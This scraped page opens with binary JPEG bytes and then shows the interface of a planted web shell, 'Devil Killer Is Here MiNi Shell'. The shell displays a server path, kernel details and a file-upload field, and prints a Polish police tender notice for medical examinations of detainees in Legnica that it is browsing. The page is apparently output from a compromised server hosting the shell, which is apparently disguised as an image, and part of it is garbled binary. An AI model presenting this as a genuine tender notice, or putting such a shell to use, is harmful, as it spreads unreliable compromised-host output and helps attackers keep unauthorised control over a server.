JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250506/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250506/0021744501-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wykonanie usług medycznych, tj. całodobowych świadczeń w zakresie badań lekarskich oraz usługi pobrania krwi wobec osób zatrzymanych/ doprowadzonych przez Policję na obszarze działania KMP w Legnicy. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Komenda Wojewódzka Policji we Wrocławiu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 930156216</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Podwale 31-33</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wrocław</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">50-040</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL514 - Miasto Wrocław</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">47 87 123 52</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">izabela.miczynska@wr.policja.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.dolnoslaska.policja.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Porządek i bezpieczeństwo publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie usług medycznych, tj. całodobowych świadczeń w zakresie badań lekarskich oraz usługi pobrania krwi wobec osób zatrzymanych/ doprowadzonych przez Policję na obszarze działania KMP w Legnicy. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-998a6051-7b9b-4a91-adf9-6e4b9f736250</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00217445</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-05-06</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00035995/19/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Udzielenie świadczeń zdrowotnych polegających na wykonywaniu badań lekarskich osób zatrzymanych/ doprowadzonych przez Policję na terenie działania KMP Legnica</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/kwp_wroclaw <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Postępowanie prowadzone jest w języku polskim za pośrednictwem<br/> platformazakupowa.pl (dalej jako „Platforma”) pod adresem: https://platformazakupowa.pl/pn/kwp_wroclaw.<br/> 2. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy:<br/> platformazakupowa.pl oraz poczty elektronicznej: izabela.miczynska@wr.policja.gov.pl.<br/> 3. W zakresie pytań technicznych związanych z działaniem systemu (Platformy) Zamawiający prosi o kontakt z Centrum Wsparcia<br/> Klienta platformazakupowa.pl pod numer tel. 22 101 02 02, cwk@platformazakupowa.pl.<br/> 4. Wymagania techniczne i organizacyjne opisane zostały w Regulaminie platformazakupowa.pl<br/> (https://platformazakupowa.pl/strona/1-regulamin)</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający, zgodnie § 11 ust. 2<br/> Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz<br/> wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/> zamówienia publicznego lub konkursie (Dz. U. z 2020 r. poz. 2452), określa niezbędne wymagania sprzętowo-aplikacyjne<br/> umożliwiające pracę na platformazakupowa.pl, tj.:<br/> 1. stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/> 2. komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/> jeden z systemów operacyjnych- MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/> 3. zainstalowana dowolna przeglądarka internetowa, Uwaga– od dnia 17 sierpnia 2021 r., ze względu na zakończenie wspierania<br/> przeglądarki Internet Explorer przez firmę Microsoft, stosowanie przeglądarki Internet Explorer nie będzie dopuszczalne,<br/> 4. włączona obsługa JavaScript,<br/> 5. zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/> 6. szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3.<br/> 7. oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg czasu<br/> lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/> Zamawiający, zgodnie § 11 ust. 2 ww. Rozporządzenia dopuszcza formaty przesyłanych danych, tj. plików o wielkości– do złożenia,<br/> zmiany, wycofania oferty wynosi 150 MB natomiast przy komunikacji wielkość pliku to maksymalnie 500 MB w formatach: .pdf, .xls,<br/> .xlsx, .doc, .docx, .txt, .rtf, .xps, .odt, .ods, .odp, .ppt, .pptx, .csv, .jpg, .jpeg, .tif, .tiff, .geotiff, .png, .svg, .wav, .mp3, .avi, .mpg, .mpeg,<br/> .mp4, .m4a, .mpeg4, .ogg, .ogv, .zip, .tar, .gz, .gzip, .7z, .html, .xhtml, .css, .xml, .xsd, .gml, .rng, .xsl, .xslt<br/> 6. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/> a. akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej<br/> platformazakupowa.pl w zakładce „Regulamin&#34; oraz uznaje go za wiążący,<br/> b. zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej na stronie internetowej:<br/> https://drive.google.com/file/d/1Kd1DttbBeiNWt4q4slS4t76lZVKPbkyD/view.<br/> Opis sposobu przygotowania ofert oraz dokumentów wymaganych przez zamawiającego opisano w rozdz. VIII.II SWZ.<br/> Oferta oraz podmiotowe środki dowodowe (jeżeli były wymagane) składane elektronicznie muszą zostać podpisane elektronicznym<br/> kwalifikowanym podpisem lub podpisem zaufanym lub podpisem osobistym. W procesie składania oferty, w tym podmiotowych<br/> środków dowodowych na platformie, podpis elektroniczny wykonawca składa bezpośrednio na dokumencie, który następnie<br/> przesyła do systemu (opcja rekomendowana przez platformazakupowa.pl). Informacje o środkach komunikacji elektronicznej, przy<br/> użyciu których zamawiający będzie komunikował się z wykonawcami, oraz informacje o wymaganiach technicznych i<br/> organizacyjnych sporządzania, wysyłania i odbierania korespondencji elektronicznej ; opis sporządzenia oferty, forma dokumentów i<br/> zalecenia– opisano w rozdz. VIII SWZ.<br/> Dokumenty i oświadczenia składane przez wykonawcę powinny być w języku polskim, chyba że w SWZ dopuszczono inaczej. W<br/> przypadku załączenia dokumentów sporządzonych w innym języku niż wymagany Wykonawca załączy tłumaczenie na język polski.<br/> Zalecenia, sposób komunikowania się opisano w rozdz. VIII.III i rozdz. VIII.IV SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 oraz art. 14 ust. 1 i 2 rozporz. PE i Rady (UE) 2016/679 z dnia<br/> 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetw. danych osobowych i w sprawie swobodnego przepływu<br/> takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia 4 maja 2016 r., str. 1;<br/> zwanym dalej „RODO”) informujemy, że:<br/> a. administratorem Pani/Pana danych osobowych jest KWP we Wrocławiu, ul. Podwale 31-33, 50-040 Wrocław.<br/> b. administrator wyznaczył Inspektora Ochrony Danych Osobowych, z którym można się kontaktować pod adresem e-mail:<br/> iod.kwp@wr.policja.gov.pl , tel. 47 87 135 98.<br/> c. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym<br/> postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie podst. bez negocjacji art. 275 ust. 1 ustawy z dnia 11<br/> września 2019 r. Pzp (t.j. Dz. U. z 2024 r. poz. 1320)– dalej „ustawa Pzp”.<br/> d. odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/> oparciu o art. 18 oraz 74 ustawy Pzp;<br/> e. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 i ust. 4 ustawy Pzp przez okres 4 lat od dnia zakończenia<br/> postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/> trwania umowy, a następnie w celu archiwalnym przez okres zgodny z instrukcją kancelaryjną i JRWA. W przypadku zam. współf. ze<br/> środków UE przez okres określony przepisami o przechowywaniu i archiwizacji dokumentów dotyczących projektów współf. z UE od<br/> dnia zakończenia postępowania o udzielenie zamówienia;<br/> f. obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/> określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego, konsekwencje<br/> niepodania określonych danych wynikają z ustawy Pzp i będą skutkować brakiem możliwości udzielenia Pani/Panu zamówienia<br/> (brakiem możliwości zawarcia umowy);<br/> g. w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22<br/> RODO.<br/> Posiada Pani/Pan:<br/> a. na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w przypadku, gdy skorzystanie z tego<br/> prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania<br/> dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o<br/> udzielenie zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie<br/> zamówienia);<br/> b. prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/> osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/> Nie przysługuje Pani/Panu:<br/> a. w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/> b. prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/> c. na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/> Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO; Przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego<br/> na niezgodne z RODO przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla przedmiotowej<br/> skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa. Jednocześnie Zamawiający przypomina o ciążącym<br/> na Pani/Panu obowiązku informacyjnym wynikającym z art. 14 RODO względem osób fizycznych, których dane przekazane zostaną<br/> Zamawiającemu w związku z prowadzonym postępowaniem i które Zamawiający pośrednio pozyska od wykonawcy biorącego udział<br/> wpostępowaniu, chyba że ma zastosowanie co najmniej jedno z wyłączeń, o których mowa w art. 14 ust. 5 RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Informacja o ograniczeniach stosowania przepisów rozporządzenia Parlamentu<br/> Europejskiego i Rady (UE) nr 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem<br/> danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o<br/> ochronie danych):- na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do<br/> sprostowania nie<br/> może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie<br/> niezgodnym z ustawą PZP oraz nie może naruszać integralności protokołu oraz jego załączników);- na podstawie art. 18 RODO<br/> prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/> okresu trwania postępowania o udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2<br/> RODO, wtym wpostępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18<br/> ust. 1 rozporządzenia nr 2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o<br/> udzielenie zamówienia publicznego (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania,<br/> wcelu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi<br/> na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego).</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PU-2380-063-016-057/2025/IM</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest Wykonanie usług medycznych w postaci całodobowych świadczeń w zakresie badań<br/> lekarskich oraz usługi pobrania krwi wobec osób zatrzymanych/ doprowadzonych przez Policję na obszarze działania<br/> Komendy Miejskiej Policji w Legnicy.<br/> 2. Przedmiotem zamówienia są całodobowe usługi medyczne wobec osób doprowadzanych przez Policję do miejsca<br/> wykonywania badań, tj.:<br/> a) całodobowe świadczenie przez Wykonawcę usług medycznych w postaci badań lekarskich osób zatrzymanych/<br/> doprowadzonych, przewidzianych w art. 15 ust 5 ustawy o Policji oraz na podstawie Rozporządzenia MSW z dnia 13<br/> września 2012 r. w sprawie badań lekarskich osób zatrzymanych przez Policję (Dz. U. z 2024 r. poz. 516 z późn. zm.), a<br/> także Rozporządzenia MSW z dnia 4 czerwca 2012 r. w sprawie pomieszczeń przeznaczonych dla osób zatrzymanych lub<br/> doprowadzonych w celu wytrzeźwienia, pokoi przejściowych, tymczasowych pomieszczeń przejściowych i policyjnych izb<br/> dziecka, regulaminu pobytu w tych pomieszczeniach, pokojach i izbach oraz sposobu postępowania z zapisami obrazu z<br/> tych pomieszczeń, pokoi i izb (t.j. Dz. U. z 2023 r. poz. 2672 z późn. zm.)<br/> wraz z wystawieniem zaświadczenia lekarskiego (wg wzorów zgodnych z ogólnie obowiązującymi przepisami) o braku lub<br/> istnieniu przeciwwskazań do przebywania w pomieszczeniu dla osób zatrzymanych lub doprowadzonych w celu<br/> wytrzeźwienia, pokoju przejściowym, tymczasowym pokoju przejściowym, policyjnej izbie dziecka, areszcie śledczym,<br/> zakładzie karnym, schronisku dla nieletnich lub zakładzie poprawczym, a także (w przypadkach koniecznych) opatrzenie<br/> prostych ran niewymagających wykonania zabiegu chirurgicznego i wystawienie recepty na niezbędne leki w ilości<br/> minimalnej koniecznej do zabezpieczenia pacjenta w trakcie przebywania w pomieszczeniu dla osób zatrzymanych wraz z<br/> określeniem sposobu ich dawkowania;<br/> b) pobranie krwi do pakietu do pobrania próbek krwi dostarczonego przez funkcjonariusza (bez badań analitycznych) oraz<br/> sporządzenia protokołu pobrania krwi (Załącznik nr 2 lub 3 do umowy);<br/> Szczegółowy opis przedmiotu zamówienia zawarto w § 1 załącznika nr 2 do SWZ– Projektowane postanowienia umowy<br/> (PPU).<br/> 3. Miejsce świadczenia usługi. Zamawiający wymaga świadczenia usługi na obszarze działania Komendy Miejskiej Policji w<br/> Legnicy. W załączniku nr 1 do SWZ– formularzu ofertowym należy podać nazwę i adres placówki, w której będą<br/> świadczone usługi.<br/> 4. Zamawiający nie dzieli zamówienia na części. Biorąc pod uwagę charakter zamówienia– jednorodność usługi, podział na<br/> części (i będąca jego konsekwencją konieczność skoordynowania działań różnych wykonawców) mógłby poważnie zagrozić<br/> właściwemu wykonaniu zamówienia. Realizacja poszczególnych czynności wchodzących w zakres świadczonej usługi jest<br/> od siebie zależna. Usługę może świadczyć tylko jeden Wykonawca– na obszarze działania Komendy Miejskiej Policji w<br/> Legnicy.<br/> Podział niniejszego zamówienia na części z przyczyn obiektywnych nie jest możliwy, działanie takie nie utrudnia jednak<br/> uczciwej konkurencji– zamówienie ze względu na wartość szacunkową skierowane jest do małych i średnich<br/> przedsiębiorstw. Zgodnie z motywem 78 dyrektywy 2014/24/UE należy umożliwić małym i średnim przedsiębiorstwom<br/> ubieganie się o udzielenie zamówień publicznych oraz zwiększyć konkurencyjność. Z motywu 78 dyrektywy 2014/24/UE nie<br/> wynika natomiast obowiązek podziału zamówienia na części w każdym przypadku.<br/> Zamawiający nie dopuszcza składania ofert częściowych. Wykonawca winien złożyć ofertę obejmującą całość przedmiotu<br/> zamówienia.<br/> 5. Warunki realizacji zamówienia Zamawiający opisał w załączniku nr 2 do SWZ– Projektowane postanowienia umowy<br/> (PPU).7. W odniesieniu do warunku określonego w art. 100 ust. 1 ustawy Pzp dotyczącego dostępności dla osób<br/> niepełnosprawnych, o których mowa w Dyrektywie Parlamentu Europejskiego i Rady 2014/24/UE z dnia 26 lutego 2014 r. w<br/> sprawie zamówień publicznych (Dz. U. UE. L 94/65 z 28 marca 2014 r.), Zamawiający informuje, że brak jest specyficznych<br/> wymagań w zakresie dostępności opisanego przedmiotu zamówienia dla osób niepełnosprawnych.<br/> 8. Oferty równoważne: Ilekroć w niniejszej Specyfikacji Warunków Zamówienia i załącznikach, przedmiot zamówienia lub<br/> jego część został określony poprzez wskazanie znaków towarowych, patentów lub pochodzenia, ocen technicznych o<br/> których mowa w art. 101 ust. 4 ustawy Pzp, źródła lub szczególnego procesu, który charakteryzuje produkty lub usługi<br/> dostarczane przez konkretnego Wykonawcę, jeśli mogłoby to prowadzić do uprzywilejowania lub wyeliminowania niektórych<br/> Wykonawców lub produktów, intencją Zamawiającego było przedstawienie „typu” materiału bądź technologii, źródła lub<br/> szczególnego procesu. W takim przypadku Zamawiający dopuszcza składanie ofert równoważnych jednocześnie wskazując<br/> wopisie przedmiotu zamówienia wyrażenie „lub równoważne” oraz kryteria stosowane w celu oceny równoważności. W<br/> przypadku opisu przedmiotu zamówienia za pomocą norm, aprobat, ocen technicznych, specyfikacji technicznych i systemu<br/> odniesienia należy przyjąć, że określono wymagania minimalne (wzorzec techniczny, jakościowy lub funkcjonalny nie gorsze<br/> niż) i jednocześnie dopuszczono przyjęcie przez Wykonawcę rozwiązań równoważnych opisywanym. Wykonawca, który<br/> powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego, jest obowiązany wykazać, że oferowane<br/> przez niego rozwiązania spełniają wymagania określone przez Zamawiającego.<br/> 9. Dopuszczalność udziału podwykonawców: Wykonawca może powierzyć wykonanie zamówienia podwykonawcom. W<br/> przypadku realizacji przedmiotu zamówienia z wykorzystaniem podwykonawców, Zamawiający żąda wskazania przez<br/> Wykonawcę tych części zamówienia, których wykonanie powierzy podwykonawcom oraz podania nazw podwykonawców<br/> (załącznik nr 4 do SWZ), o ile są znane. W przypadku braku takiej informacji w ofercie, Zamawiający przyjmie, że<br/> Wykonawca zamierza wykonać zamówienie bez udziału podwykonawców.<br/> 10. Wymagania w zakresie zatrudnienia na podstawie stosunku pracy (art. 95 ustawy Pzp).<br/> Wykonawca zobowiązany jest do zatrudnienia na podstawie stosunku pracy w rozumieniu art. 22 § 1 Kodeksu pracy,<br/> ewentualnie kontraktów o świadczenie usług zdrowotnych osób wykonujących przedmiot zamówienia na zasadach wskazanych w zapisach § 5 załącznika nr 2 do SWZ– Projektowane postanowienia umowy (PPU), tj.:<br/> 1. Zamawiający wymaga, aby czynności w przedmiocie zamówienia tj. badanie lekarskie wraz z wystawieniem<br/> zaświadczenia lekarskiego osób zatrzymanych/doprowadzonych przez Policję w celu 